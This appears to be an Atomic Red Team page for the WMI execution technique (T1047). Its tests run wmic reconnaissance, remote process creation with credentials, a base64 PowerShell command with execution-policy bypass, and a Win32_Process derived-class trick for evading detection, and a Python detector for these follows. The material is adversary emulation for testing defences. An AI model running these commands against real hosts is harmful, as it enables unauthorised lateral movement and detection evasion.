T1047 - Windows Management Instrumentation

Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)

An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)

Atomic Tests


Atomic Test #1 - WMI Reconnaissance Users

An adversary might use WMI to list all local user accounts. When the test completes, local user account information should be displayed on the command line.

Supported Platforms: Windows

Attack Commands: Run with command_prompt!

wmic useraccount get /ALL /format:csv


Atomic Test #2 - WMI Reconnaissance Processes

An adversary might use WMI to list the processes running on the compromised host. When the test completes, the running processes should be listed on the command line.

Supported Platforms: Windows

Attack Commands: Run with command_prompt!

wmic process get caption,executablepath,commandline /format:csv


Atomic Test #3 - WMI Reconnaissance Software

An adversary might use WMI to list installed software hotfixes and patches. When the test completes, there should be a list of installed patches and the dates they were installed.

Supported Platforms: Windows

Attack Commands: Run with command_prompt!

wmic qfe get description,installedOn /format:csv


Atomic Test #4 - WMI Reconnaissance List Remote Services

An adversary might use WMI to check whether a certain service is running on a remote device. When the test completes, the service's information will be displayed on the screen if it exists. A common feedback message is "No instance(s) Available" if the queried service is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable.

Supported Platforms: Windows

Inputs:

Name                   Description      Type    Default Value
node                   IP address       String  127.0.0.1
service_search_string  Name of service  String  Spooler

Attack Commands: Run with command_prompt!

wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")


Atomic Test #5 - WMI Execute Local Process

This test uses wmic.exe to execute a process on the local host. When the test completes, a new process will have been started locally. With the default input, a Notepad application is started.

Supported Platforms: Windows

Inputs:

Name                Description                          Type    Default Value
process_to_execute  Name or path of process to execute.  String  notepad.exe

Attack Commands: Run with command_prompt!

wmic process call create #{process_to_execute}

Cleanup Commands:

wmic process where name='#{process_to_execute}' delete >nul 2>&1


Atomic Test #6 - WMI Execute Remote Process

This test uses wmic.exe to execute a process on a remote host. Specify a valid remote IP address using the node parameter. To clean up, provide the same node input as the one used to run the test. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable.

Supported Platforms: Windows

Inputs:

Name                Description                          Type    Default Value
node                IP address                           String  127.0.0.1
user_name           Username                             String  DOMAIN\Administrator
password            Password                             String  P@ssw0rd1
process_to_execute  Name or path of process to execute.  String  notepad.exe

Attack Commands: Run with command_prompt!

wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}

Cleanup Commands:

wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1


Atomic Test #7 - Create a Process using WMI Query and an Encoded Command

Solarigate persistence is achieved via backdoors deployed through various techniques, including PowerShell with an EncodedCommand:

Powershell -nop -exec bypass -EncodedCommand

where the -EncodedCommand, once decoded, would resemble:

Invoke-WMIMethod win32_process -name create -argumentlist 'rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs' -ComputerName WORKSTATION

The EncodedCommand in this atomic is the following:

Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe

You should expect to see notepad.exe running after execution of this test.

Reference: Solarigate Analysis from Microsoft

Supported Platforms: Windows

Attack Commands: Run with command_prompt!

powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA


Atomic Test #8 - Create a Process using obfuscated Win32_Process

This test tries to mask process creation by creating a new class that inherits from Win32_Process. An indirect call to a suspicious method such as Win32_Process::Create can break detection logic. Reference: Cybereason blog post "No Win32_Process Needed".

Supported Platforms: Windows

Inputs:

Name                Description                          Type    Default Value
new_class           Derived class name                   String  Win32_Atomic
process_to_execute  Name or path of process to execute.  String  notepad.exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
$NewClass = $Class.Derive("#{new_class}")
$NewClass.Put()
Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}

Cleanup Commands:

$CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
$CleanupClass.Delete()
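As an added example (not part of the Atomic Red Team test file), a small Python triage helper for the defender's side of Tests #7 and #8: it decodes the base64 UTF-16LE `-EncodedCommand` payload from Test #7 and flags WMI process creation by method name rather than class name, so the derived-class variant from Test #8 is caught as well. The sample command lines are constructed here and modelled on the tests above; the regexes are this example's own, not a published rule.

```python
import base64
import re

# Constructed sample command lines modelled on the tests above; not real telemetry.
SAMPLE_COMMAND_LINES = [
    'wmic process call create notepad.exe',
    'wmic /user:DOMAIN\\Administrator /node:"10.0.0.5" process call create notepad.exe',
    'wmic qfe get description,installedOn /format:csv',
    'powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA',
    'powershell Invoke-WmiMethod -Path Win32_Atomic -Name create -ArgumentList notepad.exe',
    'notepad.exe C:\\notes.txt',
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r'(?<!\S)-e(?:ncodedcommand|ncoded|nc|c)?\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)
WMIC_CREATE = re.compile(r'\bwmic\b.*\bprocess\b.*\bcall\s+create\b', re.IGNORECASE)
# Key on the method name, not the class: a class derived from Win32_Process (Test #8)
# inherits Create, so a rule that only looks for the string "Win32_Process" misses it.
PS_WMI_CREATE = re.compile(r'Invoke-WmiMethod\b.*-Name\s+create\b', re.IGNORECASE)
REMOTE_NODE = re.compile(r'/node:', re.IGNORECASE)

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):  # not valid base64 / not UTF-16LE text
        return None

def wmi_process_creation_findings(cmdline: str):
    """Return the reasons one command line is flagged; an empty list means clean."""
    findings = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append('encoded PowerShell command')
    # Inspect the raw line and, when present, the decoded payload.
    for text in filter(None, (cmdline, decoded)):
        if WMIC_CREATE.search(text):
            findings.append('wmic process call create')
        if PS_WMI_CREATE.search(text):
            findings.append('Invoke-WmiMethod ... -Name create')
        if REMOTE_NODE.search(text):
            findings.append('remote target via /node:')
    return findings

if __name__ == '__main__':
    for line in SAMPLE_COMMAND_LINES:
        print(wmi_process_creation_findings(line) or 'clean', '<-', line[:60])
```

Reconnaissance-only lines such as the `wmic qfe` query are deliberately left unflagged here; in a real pipeline they belong to a separate, lower-severity rule.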